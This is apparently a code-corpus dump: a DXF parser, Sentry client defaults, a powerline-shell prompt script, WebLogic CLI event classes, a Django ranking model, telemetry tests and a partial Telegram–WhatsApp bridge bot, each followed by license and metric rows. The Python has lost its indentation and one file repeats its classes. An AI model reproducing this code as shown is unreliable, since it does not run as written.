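#     convert(70, '5')     -> 5       (60-79 is an int range)
#     convert(40, '2.5')   -> 2.5     (10-59 is a float range)
#     convert(310, '1A')   -> 26      (310-379 is parsed as hex)
#     convert(1, 'LINE')   -> 'LINE'  (0-9 stays a string)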
def findObject(infile, kind=''):
"""Finds the next occurance of an object."""
obj = False
while 1:
line = infile.readline()
if not line: # readline returns '' at eof
return False
if not obj: # We're still looking for our object code
if line.lower().strip() == '0':
obj = True # found it
else: # we are in an object definition
if kind: # if we're looking for a particular kind
if line.lower().strip() == kind:
obj = Object(line.lower().strip())
break
else: # otherwise take anything non-numeric
if line.lower().strip() not in string.digits:
obj = Object(line.lower().strip())
break
obj = False # whether we found one or not it's time to start over
return obj
def handleObject(infile):
"""Add data to an object until end of object is found."""
line = infile.readline()
if line.lower().strip() == 'section':
return 'section' # this would be a problem
elif line.lower().strip() == 'endsec':
return 'endsec' # this means we are done with a section
else: # add data to the object until we find a new object
obj = Object(line.lower().strip())
obj.name = obj.type
done = False
data = []
while not done:
line = infile.readline()
if not data:
if line.lower().strip() == '0':
#we've found an object, time to return
return obj
else:
# first part is always an int
data.append(int(line.lower().strip()))
else:
data.append(convert(data[0], line.strip()))
obj.data.append(data)
data = []
def handleTable(table, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(table.data)
if name: # We should always find a name
table.data.remove(item)
table.name = name.lower()
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'table':
print "Warning: previous table not closed!"
return table
elif obj.type == 'endtab':
return table # this means we are done with the table
else: # add objects to the table until one of the above is found
table.data.append(obj)
def handleBlock(block, infile):
"""Special handler for dealing with nested table objects."""
item, name = get_name(block.data)
if name: # We should always find a name
block.data.remove(item)
block.name = name
# This next bit is from handleObject
# handleObject should be generalized to work with any section like object
while 1:
obj = handleObject(infile)
if obj.type == 'block':
print "Warning: previous block not closed!"
return block
elif obj.type == 'endblk':
return block # this means we are done with the table
else: # add objects to the table until one of the above is found
block.data.append(obj)
"""These are the states/functions used in the State Machine.
states:
start - find first section
start_section - add data, find first object
object - add obj-data, watch for next obj (called directly by start_section)
end_section - look for next section or eof
end - return results
"""
def start(cargo):
"""Expects the infile as cargo, initializes the cargo."""
#print "Entering start state!"
infile = cargo
drawing = Object('drawing')
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return error, (infile, "Failed to find any sections!")
def start_section(cargo):
"""Expects [infile, drawing, section] as cargo, builds a nested section object."""
#print "Entering start_section state!"
infile = cargo[0]
drawing = cargo[1]
section = cargo[2]
# read each line, if it is an object declaration go to object mode
# otherwise create a [index, data] pair and add it to the sections data.
done = False
data = []
while not done:
line = infile.readline()
if not data: # if we haven't found a dxf code yet
if line.lower().strip() == '0':
# we've found an object
while 1: # no way out unless we find an end section or a new section
obj = handleObject(infile)
if obj == 'section': # shouldn't happen
print "Warning: failed to close previous section!"
return end_section, (infile, drawing)
elif obj == 'endsec': # This section is over, look for the next
drawing.data.append(section)
return end_section, (infile, drawing)
elif obj.type == 'table': # tables are collections of data
obj = handleTable(obj, infile) # we need to find all there contents
section.data.append(obj) # before moving on
elif obj.type == 'block': # the same is true of blocks
obj = handleBlock(obj, infile) # we need to find all there contents
section.data.append(obj) # before moving on
else: # found another sub-object
section.data.append(obj)
else:
data.append(int(line.lower().strip()))
else: # we have our code, now we just need to convert the data and add it to our list.
data.append(convert(data[0], line.strip()))
section.data.append(data)
data = []
def end_section(cargo):
"""Expects (infile, drawing) as cargo, searches for next section."""
#print "Entering end_section state!"
infile = cargo[0]
drawing = cargo[1]
section = findObject(infile, 'section')
if section:
return start_section, (infile, drawing, section)
else:
return end, (infile, drawing)
def end(cargo):
"""Expects (infile, drawing) as cargo, called when eof has been reached."""
#print "Entering end state!"
infile = cargo[0]
drawing = cargo[1]
#infile.close()
return drawing
def error(cargo):
"""Expects a (infile, string) as cargo, called when there is an error during processing."""
#print "Entering error state!"
infile = cargo[0]
err = cargo[1]
infile.close()
print "There has been an error:"
print err
return False
def readDXF(filename):
"""Given a file name try to read it as a dxf file.
Output is an object with the following structure
drawing
header
header data
classes
class data
tables
table data
blocks
block data
entities
entity data
objects
object data
where foo data is a list of sub-objects. True object data
is of the form [code, data].
"""
infile = open(filename)
sm = StateMachine()
sm.add_state(error, True)
sm.add_state(end, True)
sm.add_state(start_section)
sm.add_state(end_section)
sm.add_state(start)
sm.set_start(start)
try:
drawing = sm.run(infile)
if drawing:
drawing.name = filename
for obj in drawing.data:
item, name = get_name(obj.data)
if name:
obj.data.remove(item)
obj.name = name.lower()
setattr(drawing, name.lower(), obj)
# Call the objectify function to cast
# raw objects into the right types of object
obj.data = objectify(obj.data)
#print obj.name
finally:
infile.close()
return drawing
if __name__ == "__main__":
filename = r".\examples\block-test.dxf"
drawing = readDXF(filename)
for item in drawing.entities.data:
print item
|
apache-2.0
| -6,728,610,616,327,599,000
| 30.089239
| 121
| 0.668383
| false
| 3.310509
| false
| false
| false
|
mtrdesign/pylogwatch
|
pylogwatch/raven/conf/defaults.py
|
1
|
2071
|
"""
raven.conf.defaults
~~~~~~~~~~~~~~~~~~~
Represents the default values for all Sentry settings.
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import os
import os.path
import socket
ROOT = os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir))
# Allow local testing of Sentry even if DEBUG is enabled
DEBUG = False
# This should be the full URL to Sentry's store view
SERVERS = None
TIMEOUT = 5
# TODO: this is specific to Django
CLIENT = 'raven.contrib.django.DjangoClient'
# Not all environments have access to socket module, for example Google App Engine
# Need to check to see if the socket module has ``gethostname``, if it doesn't we
# will set it to None and require it passed in to ``Client`` on initialization.
NAME = socket.gethostname() if hasattr(socket, 'gethostname') else None
# Superuser key -- will be used if set, otherwise defers to
# SECRET_KEY and PUBLIC_KEY
KEY = None
# Credentials to authenticate with the Sentry server
SECRET_KEY = None
PUBLIC_KEY = None
# We allow setting the site name either by explicitly setting it with the
# SENTRY_SITE setting, or using the django.contrib.sites framework for
# fetching the current site. Since we can't reliably query the database
# from this module, the specific logic is within the SiteFilter
SITE = None
# Extending this allow you to ignore module prefixes when we attempt to
# discover which function an error comes from (typically a view)
EXCLUDE_PATHS = []
# By default Sentry only looks at modules in INSTALLED_APPS for drilling down
# where an exception is located
INCLUDE_PATHS = []
# The maximum number of elements to store for a list-like structure.
MAX_LENGTH_LIST = 50
# The maximum length to store of a string-like structure.
MAX_LENGTH_STRING = 400
# Automatically log frame stacks from all ``logging`` messages.
AUTO_LOG_STACKS = False
# Client-side data processors to apply
PROCESSORS = (
'raven.processors.SanitizePasswordsProcessor',
)
# Default Project ID
PROJECT = 1
|
gpl-3.0
| -8,137,903,970,246,429,000
| 28.585714
| 82
| 0.750845
| false
| 3.8
| false
| false
| false
|
LeonardoGentile/powerline-shell
|
powerline-shell.old.py
|
1
|
15940
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import os
import sys
def warn(msg):
print '[powerline-bash] ', msg
class Powerline:
symbols = {
'compatible': {
'lock': 'RO',
'network': 'SSH',
'separator': u'\u25B6',
'separator_thin': u'\u276F'
},
'patched': {
'lock': u'\uE0A2',
'network': u'\uE0A2',
'separator': u'\uE0B0',
'separator_thin': u'\uE0B1'
},
'flat': {
'lock': '',
'network': '',
'separator': '',
'separator_thin': ''
},
}
color_templates = {
'bash': '\\[\\e%s\\]',
'zsh': '%%{%s%%}',
'bare': '%s',
}
def __init__(self, args, cwd):
self.args = args
self.cwd = cwd
mode, shell = args.mode, args.shell
self.color_template = self.color_templates[shell]
self.reset = self.color_template % '[0m'
self.lock = Powerline.symbols[mode]['lock']
self.network = Powerline.symbols[mode]['network']
self.separator = Powerline.symbols[mode]['separator']
self.separator_thin = Powerline.symbols[mode]['separator_thin']
self.segments = []
def color(self, prefix, code):
return self.color_template % ('[%s;5;%sm' % (prefix, code))
def fgcolor(self, code):
return self.color('38', code)
def bgcolor(self, code):
return self.color('48', code)
def append(self, content, fg, bg, separator=None, separator_fg=None):
self.segments.append((content, fg, bg, separator or self.separator,
separator_fg or bg))
def draw(self):
return (''.join(self.draw_segment(i) for i in range(len(self.segments)))
+ self.reset).encode('utf-8')
def draw_segment(self, idx):
segment = self.segments[idx]
next_segment = self.segments[idx + 1] if idx < len(self.segments)-1 else None
return ''.join((
self.fgcolor(segment[1]),
self.bgcolor(segment[2]),
segment[0],
self.bgcolor(next_segment[2]) if next_segment else self.reset,
self.fgcolor(segment[4]),
segment[3]))
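# Illustrative sketch (hypothetical colors; assumes `args` comes from the
# argument parser defined below): segments are appended as (content, fg, bg)
# 256-color codes and rendered in one pass:
#     p = Powerline(args, os.getcwd())
#     p.append(' ~ ', 15, 31)
#     p.append(' $ ', 15, 236)
#     sys.stdout.write(p.draw())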
def get_valid_cwd():
""" We check if the current working directory is valid or not. Typically
happens when you checkout a different branch on git that doesn't have
this directory.
We return the original cwd because the shell still considers that to be
the working directory, so returning our guess will confuse people
"""
try:
cwd = os.getcwd()
except:
cwd = os.getenv('PWD') # This is where the OS thinks we are
parts = cwd.split(os.sep)
up = cwd
while parts and not os.path.exists(up):
parts.pop()
up = os.sep.join(parts)
try:
os.chdir(up)
except:
warn("Your current directory is invalid.")
sys.exit(1)
warn("Your current directory is invalid. Lowest valid directory: " + up)
return cwd
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('--cwd-only', action='store_true',
help='Only show the current directory')
arg_parser.add_argument('--cwd-max-depth', action='store', type=int,
default=5, help='Maximum number of directories to show in path')
arg_parser.add_argument('--colorize-hostname', action='store_true',
help='Colorize the hostname based on a hash of itself.')
arg_parser.add_argument('--mode', action='store', default='patched',
help='The characters used to make separators between segments',
choices=['patched', 'compatible', 'flat'])
arg_parser.add_argument('--shell', action='store', default='bash',
help='Set this to your shell type', choices=['bash', 'zsh', 'bare'])
arg_parser.add_argument('prev_error', nargs='?', type=int, default=0,
help='Error code returned by the last command')
args = arg_parser.parse_args()
powerline = Powerline(args, get_valid_cwd())
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
class DefaultColor:
"""
This class should have the default colors for every segment.
Please test every new segment with this theme first.
"""
USERNAME_FG = 250
USERNAME_BG = 240
USERNAME_ROOT_BG = 124
HOSTNAME_FG = 250
HOSTNAME_BG = 238
HOME_SPECIAL_DISPLAY = True
HOME_BG = 31 # blueish
HOME_FG = 15 # white
PATH_BG = 237 # dark grey
PATH_FG = 250 # light grey
CWD_FG = 254 # nearly-white grey
SEPARATOR_FG = 244
READONLY_BG = 124
READONLY_FG = 254
SSH_BG = 166 # medium orange
SSH_FG = 254
REPO_CLEAN_BG = 148 # a light green color
REPO_CLEAN_FG = 0 # black
REPO_DIRTY_BG = 161 # pink/red
REPO_DIRTY_FG = 15 # white
JOBS_FG = 39
JOBS_BG = 238
CMD_PASSED_BG = 236
CMD_PASSED_FG = 15
CMD_FAILED_BG = 161
CMD_FAILED_FG = 15
SVN_CHANGES_BG = 148
SVN_CHANGES_FG = 22 # dark green
VIRTUAL_ENV_BG = 35 # a mid-tone green
VIRTUAL_ENV_FG = 00
class Color(DefaultColor):
"""
This subclass is required when the user chooses to use 'default' theme.
Because the segments require a 'Color' class for every theme.
"""
pass
import os
def add_virtual_env_segment():
env = os.getenv('VIRTUAL_ENV')
if env is None:
return
env_name = os.path.basename(env)
bg = Color.VIRTUAL_ENV_BG
fg = Color.VIRTUAL_ENV_FG
powerline.append(' %s ' % env_name, fg, bg)
add_virtual_env_segment()
def add_username_segment():
import os
if powerline.args.shell == 'bash':
user_prompt = ' \\u '
elif powerline.args.shell == 'zsh':
user_prompt = ' %n '
else:
user_prompt = ' %s ' % os.getenv('USER')
if os.getenv('USER') == 'root':
bgcolor = Color.USERNAME_ROOT_BG
else:
bgcolor = Color.USERNAME_BG
powerline.append(user_prompt, Color.USERNAME_FG, bgcolor)
add_username_segment()
def add_hostname_segment():
if powerline.args.colorize_hostname:
from lib.color_compliment import stringToHashToColorAndOpposite
from lib.colortrans import rgb2short
from socket import gethostname
hostname = gethostname()
FG, BG = stringToHashToColorAndOpposite(hostname)
FG, BG = (rgb2short(*color) for color in [FG, BG])
host_prompt = ' %s' % hostname.split('.')[0]
powerline.append(host_prompt, FG, BG)
else:
if powerline.args.shell == 'bash':
host_prompt = ' \\h '
elif powerline.args.shell == 'zsh':
host_prompt = ' %m '
else:
import socket
host_prompt = ' %s ' % socket.gethostname().split('.')[0]
powerline.append(host_prompt, Color.HOSTNAME_FG, Color.HOSTNAME_BG)
add_hostname_segment()
import os
def add_ssh_segment():
if os.getenv('SSH_CLIENT'):
powerline.append(' %s ' % powerline.network, Color.SSH_FG, Color.SSH_BG)
add_ssh_segment()
import os
def get_short_path(cwd):
home = os.getenv('HOME')
names = cwd.split(os.sep)
if names[0] == '': names = names[1:]
path = ''
for i in range(len(names)):
path += os.sep + names[i]
if os.path.samefile(path, home):
return ['~'] + names[i+1:]
if not names[0]:
return ['/']
return names
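# Illustrative sketch (assuming HOME=/home/user and that the directories exist,
# since os.path.samefile touches the filesystem):
#     get_short_path('/home/user/projects/app')  -> ['~', 'projects', 'app']
#     get_short_path('/etc/nginx')               -> ['etc', 'nginx']
#     get_short_path('/')                        -> ['/']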
def add_cwd_segment():
cwd = powerline.cwd or os.getenv('PWD')
names = get_short_path(cwd.decode('utf-8'))
max_depth = powerline.args.cwd_max_depth
if len(names) > max_depth:
names = names[:2] + [u'\u2026'] + names[2 - max_depth:]
if not powerline.args.cwd_only:
for n in names[:-1]:
if n == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % n, Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % n, Color.PATH_FG, Color.PATH_BG,
powerline.separator_thin, Color.SEPARATOR_FG)
if names[-1] == '~' and Color.HOME_SPECIAL_DISPLAY:
powerline.append(' %s ' % names[-1], Color.HOME_FG, Color.HOME_BG)
else:
powerline.append(' %s ' % names[-1], Color.CWD_FG, Color.PATH_BG)
add_cwd_segment()
import os
def add_read_only_segment():
cwd = powerline.cwd or os.getenv('PWD')
if not os.access(cwd, os.W_OK):
powerline.append(' %s ' % powerline.lock, Color.READONLY_FG, Color.READONLY_BG)
add_read_only_segment()
import re
import subprocess
def get_git_status():
has_pending_commits = True
has_untracked_files = False
origin_position = ""
output = subprocess.Popen(['git', 'status', '--ignore-submodules'],
env={"LANG": "C", "HOME": os.getenv("HOME")}, stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
origin_status = re.findall(
r"Your branch is (ahead|behind).*?(\d+) comm", line)
if origin_status:
origin_position = " %d" % int(origin_status[0][1])
if origin_status[0][0] == 'behind':
origin_position += u'\u21E3'
if origin_status[0][0] == 'ahead':
origin_position += u'\u21E1'
if line.find('nothing to commit') >= 0:
has_pending_commits = False
if line.find('Untracked files') >= 0:
has_untracked_files = True
return has_pending_commits, has_untracked_files, origin_position
def add_git_segment():
# See http://git-blame.blogspot.com/2013/06/checking-current-branch-programatically.html
p = subprocess.Popen(['git', 'symbolic-ref', '-q', 'HEAD'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if 'Not a git repo' in err:
return
if out:
branch = out[len('refs/heads/'):].rstrip()
else:
branch = '(Detached)'
has_pending_commits, has_untracked_files, origin_position = get_git_status()
branch += origin_position
if has_untracked_files:
branch += ' +'
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
if has_pending_commits:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
powerline.append(' %s ' % branch, fg, bg)
try:
add_git_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = subprocess.Popen(['hg', 'status'],
stdout=subprocess.PIPE).communicate()[0]
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
def add_hg_segment():
branch = os.popen('hg branch 2> /dev/null').read().rstrip()
if len(branch) == 0:
return False
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return powerline.append(' %s ' % branch, fg, bg)
add_hg_segment()
import subprocess
def add_svn_segment():
is_svn = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
is_svn_output = is_svn.communicate()[1].strip()
if len(is_svn_output) != 0:
return
#"svn status | grep -c "^[ACDIMRX\\!\\~]"
p1 = subprocess.Popen(['svn', 'status'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen(['grep', '-c', '^[ACDIMR\\!\\~]'],
stdin=p1.stdout, stdout=subprocess.PIPE)
output = p2.communicate()[0].strip()
if len(output) > 0 and int(output) > 0:
changes = output.strip()
powerline.append(' %s ' % changes, Color.SVN_CHANGES_FG, Color.SVN_CHANGES_BG)
try:
add_svn_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import subprocess
def get_fossil_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
output = os.popen('fossil changes 2>/dev/null').read().strip()
has_untracked_files = True if os.popen("fossil extras 2>/dev/null").read().strip() else False
has_missing_files = 'MISSING' in output
has_modified_files = 'EDITED' in output
return has_modified_files, has_untracked_files, has_missing_files
def add_fossil_segment():
subprocess.Popen(['fossil'], stdout=subprocess.PIPE).communicate()[0]
branch = ''.join([i.replace('*','').strip() for i in os.popen("fossil branch 2> /dev/null").read().strip().split("\n") if i.startswith('*')])
if len(branch) == 0:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_fossil_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
powerline.append(' %s ' % branch, fg, bg)
try:
add_fossil_segment()
except OSError:
pass
except subprocess.CalledProcessError:
pass
import os
import re
import subprocess
def add_jobs_segment():
pppid = subprocess.Popen(['ps', '-p', str(os.getppid()), '-oppid='], stdout=subprocess.PIPE).communicate()[0].strip()
output = subprocess.Popen(['ps', '-a', '-o', 'ppid'], stdout=subprocess.PIPE).communicate()[0]
num_jobs = len(re.findall(str(pppid), output)) - 1
if num_jobs > 0:
powerline.append(' %d ' % num_jobs, Color.JOBS_FG, Color.JOBS_BG)
add_jobs_segment()
def add_root_indicator_segment():
root_indicators = {
'bash': ' \\$ ',
'zsh': ' \\$ ',
'bare': ' $ ',
}
bg = Color.CMD_PASSED_BG
fg = Color.CMD_PASSED_FG
if powerline.args.prev_error != 0:
fg = Color.CMD_FAILED_FG
bg = Color.CMD_FAILED_BG
powerline.append(root_indicators[powerline.args.shell], fg, bg)
add_root_indicator_segment()
sys.stdout.write(powerline.draw())
|
mit
| 5,095,947,534,413,453,000
| 27.876812
| 145
| 0.589649
| false
| 3.42207
| false
| false
| false
|
cerndb/wls-cli
|
wls_rest/src/wlscli/common/event.py
|
1
|
2248
|
#!/usr/bin/env python
#*******************************************************************************
# Copyright (C) 2015, CERN
# This software is distributed under the terms of the GNU General Public
# License version 3 (GPL Version 3), copied verbatim in the file "LICENSE".
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as Intergovernmental Organization
# or submit itself to any jurisdiction.
#
#
#*******************************************************************************
'''
Created on Oct 31, 2015
@author: Konrad Kaczkowski
'''
from utils import Operation
class UserEvent(object):
pass
class ConsoleUIEvent(object):
def __init__(self, command):
''' Constructor '''
self.command = command
class AdminChangeEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class AppEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class DeploymentEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class LogsEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ServerEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class ShowEvent(UserEvent):
def __init__(self, operation):
''' Constructor '''
self.auth_operation = None
self.operation = operation
class EventFactory(object):
types = { Operation.Server: ServerEvent, Operation.App: AppEvent,
Operation.Deployment: DeploymentEvent, Operation.Logs: LogsEvent,
Operation.Show: ShowEvent, Operation.AdmChange: AdminChangeEvent}
def __new__(cls, operation):
return EventFactory.types[type(operation)](operation)
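# Illustrative sketch (assuming Operation.Server et al. are classes defined in
# utils and `server_op` is an instance of Operation.Server):
#     event = EventFactory(server_op)
#     isinstance(event, ServerEvent)   # -> True
#     event.operation is server_op     # -> True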
|
gpl-3.0
| 7,370,498,741,496,446,000
| 30.608696
| 80
| 0.581851
| false
| 4.487026
| false
| false
| false
|
katharosada/bus-shaming
|
busshaming/models/route_ranking.py
|
1
|
1414
|
import uuid
from django.db import connection, models
from busshaming.enums import RouteMetric, MetricTimespan
UPSERT_ENTRY = '''
INSERT INTO busshaming_routeranking (id, route_id, date, timespan, metric, rank, display_rank, value)
VALUES (uuid_generate_v4(), %s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (date, timespan, metric, rank)
DO UPDATE
SET route_id = EXCLUDED.route_id,
display_rank = EXCLUDED.display_rank,
value = EXCLUDED.value
'''
class RouteRankingManager(models.Manager):
def upsert(self, route_id, date, timespan, metric, rank, display_rank, value):
with connection.cursor() as cursor:
cursor.execute(UPSERT_ENTRY, (route_id, date, timespan, metric, rank, display_rank, value))
class RouteRanking(models.Model):
"""Denormalization of top N of each different kind of ranking."""
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
route = models.ForeignKey('Route')
date = models.DateField(db_index=True)
timespan = models.PositiveSmallIntegerField(choices=MetricTimespan.choices())
metric = models.PositiveSmallIntegerField(choices=RouteMetric.choices())
rank = models.PositiveSmallIntegerField()
display_rank = models.PositiveSmallIntegerField()
value = models.FloatField()
class Meta:
index_together = (('date', 'timespan', 'metric'),)
unique_together = (('date', 'timespan', 'metric', 'rank'),)
|
mit
| -8,858,094,445,648,581,000
| 36.210526
| 103
| 0.706506
| false
| 3.570707
| false
| false
| false
|
Overdrivr/pytelemetry
|
pytelemetry/test/test_typing.py
|
1
|
1747
|
from pytelemetry import Pytelemetry
import queue
import pytest
import unittest.mock as mock
class transportMock:
def __init__(self):
self.queue = queue.Queue()
def read(self, maxbytes=1):
data = []
amount = 0
while amount < maxbytes and not self.queue.empty():
c = self.queue.get()
data.append(c)
amount += 1
return data
def readable(self):
return self.queue.qsize()
def write(self, data):
for i in range(len(data)):
self.queue.put(data[i])
return 0
def writeable(self):
return not self.queue.full()
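# Illustrative sketch (not one of the original tests): the mock simply loops
# written bytes back through its internal queue, e.g.
#     t = transportMock()
#     t.write([1, 2, 3])
#     t.readable()   # -> 3
#     t.read(2)      # -> [1, 2]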
def test_wrong_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(Exception) as excinfo:
c.publish('sometopic',12,'string')
# TODO : Assert exception
assert t.queue.qsize() == 0
def test_unexisting_type():
# Setup
t = transportMock()
c = Pytelemetry(t)
with pytest.raises(IndexError):
c.publish('sometopic',12,'int323')
assert t.queue.qsize() == 0
def test_hardcoded():
t = transportMock()
c = Pytelemetry(t)
cb = mock.Mock(spec=["topic","data"])
c.subscribe('sometopic ',cb)
# Apply hardcoded frame directly generated by the c library
# SOF head sometopic..................................... eol 12457........ crc..... eof
t.write([247, 6, 0, 115, 111, 109, 101, 116, 111, 112, 105, 99, 32, 0, 169, 48, 0, 0, 111, 249, 127])
c.update()
assert t.queue.qsize() == 0
cb.assert_called_once_with('sometopic ',12457, None)
    # TODO : Check what happens if the string is not null terminated
# TODO : Check what happens if there are spaces in name
# TODO Check wrong crc
|
mit
| -6,212,126,936,606,328,000
| 25.876923
| 105
| 0.588437
| false
| 3.565306
| true
| false
| false
|
MikeHoffert/caladbolg-engine
|
caladbolg/agents/battle.py
|
1
|
1210
|
import pyglet
from caladbolg.graphics import graphics_context
class ScriptedBattle:
def __init__(self, background_image, monsters, party):
self.background_image = background_image
self.monsters = monsters
self.party = party
def start_battle(self):
image = pyglet.image.load(self.background_image)
background_sprite = pyglet.sprite.Sprite(image)
# Figure out if we need to scale the background image for the user's screen
sprite_width = background_sprite.width
sprite_height = background_sprite.height
screen_width = graphics_context.screen_width
screen_height = graphics_context.screen_height
scale_factor = 1
if sprite_width < screen_width or sprite_height < screen_height:
scale_factor = min(screen_width / sprite_width, screen_height / sprite_height)
elif sprite_width > screen_width and sprite_height > screen_height:
scale_factor = max(screen_width / sprite_width, screen_height / sprite_height)
background_sprite.scale = scale_factor
graphics_context.sprite_buffer['background']['battle_background'] = background_sprite
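        # Worked example (hypothetical sizes): a 1280x720 background on a
        # 1920x1080 screen is smaller in both dimensions, so
        # scale_factor = min(1920/1280, 1080/720) = 1.5; a 2560x1440 background
        # on the same screen is larger in both dimensions, so
        # scale_factor = max(1920/2560, 1080/1440) = 0.75.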
|
mit
| -1,500,129,962,873,362,000
| 42.814815
| 93
| 0.671901
| false
| 4.29078
| false
| false
| false
|
LeoGe/whattelcopybot
|
telegram_bot.py
|
1
|
6255
|
from multiprocessing import Process, Pipe
from os import getpid, urandom, path
from time import sleep
from enum import Enum
import binascii, json, signal, sys
from random import randint
from telegram.ext import Updater
from telegram.ext.dispatcher import run_async
from telegram.update import Update
class Command(Enum):
message = 1
token = 2
token_ack = 3
delete = 4
class TelegramBot(Process):
CREDENTIALS = "<CREDENTIALS-HERE>"
SAVEPATH = path.expanduser("~") + "/.config/whattelcopybot/telegram"
def __init__(self, conn):
self.connection=conn
super(TelegramBot, self).__init__()
self.telegram_to_whatsapp=dict()
with open("tokens.txt") as f:
self.poems = f.read().splitlines()
    # save hashmap to file on exit
def save_to_file(self, signum, frame):
with open(TelegramBot.SAVEPATH, 'w+') as f:
f.write(json.dumps(self.telegram_to_whatsapp))
f.truncate()
sys.exit(0)
#load hashmap from file (if it exists and is not empty)
def load_from_file(self):
if path.isfile(TelegramBot.SAVEPATH):
with open(TelegramBot.SAVEPATH) as f:
read=f.read()
if read!="":
self.telegram_to_whatsapp = json.loads(read)
#send message to Telegram chat
def got_whatsapp(self, bot, msg):
if not "," in msg:
bot.sendMessage(int(msg), "Success: Connected to Whatsapp group!")
else:
telegram_id, content = msg.split(",")
bot.sendMessage(int(telegram_id), text=content)
# if both groups are connected send message to WhatsappBot
def got_telegram(self,bot,update):
if not type(update) is Update or update.message == None:
return
if update.message.new_chat_participant!=None:
if update.message.new_chat_participant.username=="WhattelCopyBot":
self.help(bot,update)
elif update.message.left_chat_participant!=None:
if update.message.left_chat_participant.username=="WhattelCopyBot":
print("REMOVE")
if str(update.message.chat_id) in self.telegram_to_whatsapp:
self.connection.send([Command.delete, self.telegram_to_whatsapp[str(update.message.chat_id)]])
del self.telegram_to_whatsapp[str(update.message.chat_id)]
elif str(update.message.chat_id) in self.telegram_to_whatsapp:
whatsapp_id=self.telegram_to_whatsapp[str(update.message.chat_id)]
self.connection.send([Command.message, whatsapp_id, update.message.from_user.first_name+ ": " + update.message.text])
def help(self,bot,update):
helpText="Hello Traveller, my name is John Whattel. I will copy all of your messages from whatsapp to telegram and vice versa.\n/token (generate token to connects two chats)\n/delete (disconnects the chats)\n/help (show this notice again)"
bot.sendMessage(update.message.chat_id,text=helpText)
# generate token and send it to WhatsappBot and to the Telegram chat
def get_token(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
bot.sendMessage(update.message.chat_id,text="Sorry, chat is already connected to a Whatsapp group!")
return
        rand_int = randint(0, len(self.poems) - 1)
        while self.poems[rand_int] == "":
            rand_int = randint(0, len(self.poems) - 1)
bot.sendMessage(update.message.chat_id, text="Please paste this token into the Whatsapp chat you want to be connected to. I have to be a member of this chat.")
bot.sendMessage(update.message.chat_id, text="Generated token: "+self.poems[rand_int])
self.connection.send([Command.token, self.poems[rand_int], update.message.chat_id])
self.poems[rand_int]=""
def delete(self, bot, update):
if str(update.message.chat_id) in self.telegram_to_whatsapp:
